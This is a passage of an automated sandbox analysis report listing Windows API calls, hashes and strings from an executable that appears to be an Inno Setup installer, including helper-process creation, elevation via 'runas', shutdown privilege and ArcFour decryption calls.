                                                                  • Instruction Fuzzy Hash: 0BD05BE27011205BC701BAED54C4AC667CC4B4925671440BBF904EF257D638CD514398
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467650,00000000,00000000,00000000,0000000C,00000000), ref: 00466980
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                  • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                  • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                  • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,0045159F,00000000), ref: 0042CD27
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: a20a0933f9adf495ad294cc7f43800295bba8e01ea8a7e04e2e8fcb3411a2c60
                                                                  • Instruction ID: 582242be021ecdaa9f487f520a6273a00fb8a2f6ff7a96cbd182f7b59f56d267
                                                                  • Opcode Fuzzy Hash: a20a0933f9adf495ad294cc7f43800295bba8e01ea8a7e04e2e8fcb3411a2c60
                                                                  • Instruction Fuzzy Hash: 9EC08CE03222101A9E1069BD2CC521F46C8891823A3A41E3BB528E72D2E23D88262818
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8BC,0040CE68,?,00000000,?), ref: 00406ECD
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 434cd2ceddc45fc6059baf9bd558cd456b1210cf1f9af3b638900e146cb02294
                                                                  • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                  • Opcode Fuzzy Hash: 434cd2ceddc45fc6059baf9bd558cd456b1210cf1f9af3b638900e146cb02294
                                                                  • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                  APIs
                                                                  • SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                                    • Part of subcall function 00450688: GetLastError.KERNEL32(004504A4,0045074A,?,00000000,?,00497338,00000001,00000000,00000002,00000000,00497499,?,?,00000005,00000000,004974CD), ref: 0045068B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 734332943-0
                                                                  • Opcode ID: df934b34f1bc85ce2471d95e5f96b66cab128c3cad0ff5fb16097d4bfcec1436
                                                                  • Instruction ID: b7b79c15840fa76abef9437e43e4f8825fb2e58c400bd883dda953f657da4aaf
                                                                  • Opcode Fuzzy Hash: df934b34f1bc85ce2471d95e5f96b66cab128c3cad0ff5fb16097d4bfcec1436
                                                                  • Instruction Fuzzy Hash: A9C09BB93011158BDF50E6FEC5C1D0763DC6F5C30A7514166BD04CF207E668DC154B18
                                                                  APIs
                                                                  • SetCurrentDirectoryA.KERNEL32(00000000,?,004972C6,00000000,00497499,?,?,00000005,00000000,004974CD,?,?,00000000), ref: 004072A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CurrentDirectory
                                                                  • String ID:
                                                                  • API String ID: 1611563598-0
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(?,0042E405), ref: 0042E3F8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID:
                                                                  • API String ID: 2340568224-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0047D754,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047D70E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 626452242-0
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,00453001), ref: 00452FE3
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1452528299-0
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00001370,00005373,00401973), ref: 00401766
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  APIs
                                                                  • GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                                  • SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                                  • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                                  • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                                  • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                                  • FreeLibrary.KERNEL32(00000001,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F267
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                  • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                  • API String ID: 2323315520-3614243559
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 0045844F
                                                                  • QueryPerformanceCounter.KERNEL32(02213858,00000000,004586E2,?,?,02213858,00000000,?,00458DDE,?,02213858,00000000), ref: 00458458
                                                                  • GetSystemTimeAsFileTime.KERNEL32(02213858,02213858), ref: 00458462
                                                                  • GetCurrentProcessId.KERNEL32(?,02213858,00000000,004586E2,?,?,02213858,00000000,?,00458DDE,?,02213858,00000000), ref: 0045846B
                                                                  • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004584E1
                                                                  • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02213858,02213858), ref: 004584EF
                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458537
                                                                  • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045868D,?,00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458570
                                                                    • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                  • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458619
                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045864F
                                                                  • CloseHandle.KERNEL32(000000FF,00458694,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458687
                                                                    • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                  • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                  • API String ID: 770386003-3271284199
                                                                  APIs
                                                                    • Part of subcall function 00477E04: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02212BEC,?,?,?,02212BEC,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                                    • Part of subcall function 00477E04: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
                                                                    • Part of subcall function 00477E04: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BEC,?,?,?,02212BEC,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                                    • Part of subcall function 00477E04: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BEC,?,?,?,02212BEC), ref: 00477E60
                                                                    • Part of subcall function 00477E04: CloseHandle.KERNEL32(00000000,?,?,?,02212BEC,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                                    • Part of subcall function 00477EDC: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00477F6E,?,?,?,02212BEC,?,00477FD0,00000000,004780E6,?,?,-00000010,?), ref: 00477F0C
                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00478020
                                                                  • GetLastError.KERNEL32(00000000,004780E6,?,?,-00000010,?), ref: 00478029
                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00478076
                                                                  • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 0047809A
                                                                  • CloseHandle.KERNEL32(00000000,004780CB,00000000,00000000,000000FF,000000FF,00000000,004780C4,?,00000000,004780E6,?,?,-00000010,?), ref: 004780BE
                                                                  Similarity
                                                                  • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                  • String ID: =G$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                  • API String ID: 883996979-2356621170
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229EC
                                                                  • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BB6), ref: 004229FC
                                                                  Similarity
                                                                  • API ID: MessageSendShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1631623395-0
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 0041838B
                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 004183A8
                                                                  • GetWindowRect.USER32(?), ref: 004183C4
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004183D2
                                                                  • GetWindowLongA.USER32(?,000000F8), ref: 004183E7
                                                                  • ScreenToClient.USER32(00000000), ref: 004183F0
                                                                  • ScreenToClient.USER32(00000000,?), ref: 004183FB
                                                                  Similarity
                                                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                  • String ID: ,
                                                                  • API String ID: 2266315723-3772416878
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 004555C7
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555CD
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555E6
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045560D
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455612
                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00455623
                                                                  Similarity
                                                                  • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                  • String ID: SeShutdownPrivilege
                                                                  • API String ID: 107509674-3733053543
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045CFB1
                                                                  • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045CFC1
                                                                  • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045CFD1
                                                                  • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047EFB7,00000000,0047EFE0), ref: 0045CFF6
                                                                  Similarity
                                                                  • API ID: AddressProc$CryptVersion
                                                                  • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                  • API String ID: 1951258720-508647305
                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC,?,?,00000000,0049B628), ref: 00497607
                                                                  • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049768A
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000), ref: 004976A2
                                                                  • FindClose.KERNEL32(000000FF,004976CD,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC), ref: 004976C0
                                                                  Similarity
                                                                  • API ID: FileFind$AttributesCloseFirstNext
                                                                  • String ID: isRS-$isRS-???.tmp
                                                                  • API String ID: 134685335-3422211394
                                                                  APIs
                                                                  • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457431
                                                                  • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457458
                                                                  • SetForegroundWindow.USER32(?), ref: 00457469
                                                                  • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457741,?,00000000,0045777D), ref: 0045772C
                                                                  Strings
                                                                  • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575AC
                                                                  Similarity
                                                                  • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                  • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                  • API String ID: 2236967946-3182603685
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 00417D07
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
                                                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
                                                                  Similarity
                                                                  • API ID: Window$Placement$Iconic
                                                                  • String ID: ,
                                                                  • API String ID: 568898626-3772416878
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001,00000000,00463CC1), ref: 00463B35
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463BC4
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C56
                                                                  • FindClose.KERNEL32(000000FF,00463C7D,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C70
                                                                  Similarity
                                                                  • API ID: Find$File$CloseErrorFirstModeNext
                                                                  • String ID:
                                                                  • API String ID: 4011626565-0
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001,00000000,00464167), ref: 00463FF5
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046403B
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 004640F0
                                                                  • FindClose.KERNEL32(000000FF,0046411B,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046410E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$CloseErrorFirstModeNext
                                                                  • String ID:
                                                                  • API String ID: 4011626565-0
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E94E
                                                                  • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E979
                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E986
                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E98E
                                                                  • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E994
                                                                  Similarity
                                                                  • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                  • String ID:
                                                                  • API String ID: 1177325624-0
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 00482F36
                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00482F54
                                                                  • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F76
                                                                  • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F8A
                                                                  Similarity
                                                                  • API ID: Window$Show$IconicLong
                                                                  • String ID:
                                                                  • API String ID: 2754861897-0
                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,0046264C), ref: 004625D0
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0046262C,?,00000000,?,00000000,0046264C), ref: 0046260C
                                                                  • FindClose.KERNEL32(000000FF,00462633,0046262C,?,00000000,?,00000000,0046264C), ref: 00462626
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 3541575487-0
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 004241DC
                                                                  • SetActiveWindow.USER32(?,?,?,0046CB73), ref: 004241E9
                                                                    • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                                    • Part of subcall function 00423B0C: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,022125AC,00424202,?,?,?,0046CB73), ref: 00423B47
                                                                  • SetFocus.USER32(00000000,?,?,?,0046CB73), ref: 00424216
                                                                  Similarity
                                                                  • API ID: Window$ActiveFocusIconicShow
                                                                  • String ID:
                                                                  • API String ID: 649377781-0
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 00417D07
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
                                                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
                                                                  Similarity
                                                                  • API ID: Window$Placement$Iconic
                                                                  • String ID:
                                                                  • API String ID: 568898626-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: CaptureIconic
                                                                  • String ID:
                                                                  • API String ID: 2277910766-0
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 00424193
                                                                    • Part of subcall function 00423A7C: EnumWindows.USER32(00423A14), ref: 00423AA0
                                                                    • Part of subcall function 00423A7C: GetWindow.USER32(?,00000003), ref: 00423AB5
                                                                    • Part of subcall function 00423A7C: GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                                    • Part of subcall function 00423A7C: SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                                  • SetActiveWindow.USER32(?,?,?,00423D6B,00000000,00424154), ref: 004241A7
                                                                    • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                                  Similarity
                                                                  • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                  • String ID:
                                                                  • API String ID: 2671590913-0
                                                                  APIs
                                                                  • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D067
                                                                  Similarity
                                                                  • API ID: CryptFour
                                                                  • String ID:
                                                                  • API String ID: 2153018856-0
                                                                  APIs
                                                                  • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046D934,?,0046DB15), ref: 0045D07A
                                                                  Similarity
                                                                  • API ID: CryptFour
                                                                  • String ID:
                                                                  • API String ID: 2153018856-0
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3048728869.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                  • Associated: 00000003.00000002.3048702648.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                  • Associated: 00000003.00000002.3048749095.0000000010002000.00000002.00000001.01000000.00000008.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_10000000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3048728869.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                  • Associated: 00000003.00000002.3048702648.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                  • Associated: 00000003.00000002.3048749095.0000000010002000.00000002.00000001.01000000.00000008.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_10000000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  APIs
                                                                    • Part of subcall function 0044B5FC: GetVersionExA.KERNEL32(00000094), ref: 0044B619
                                                                  • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
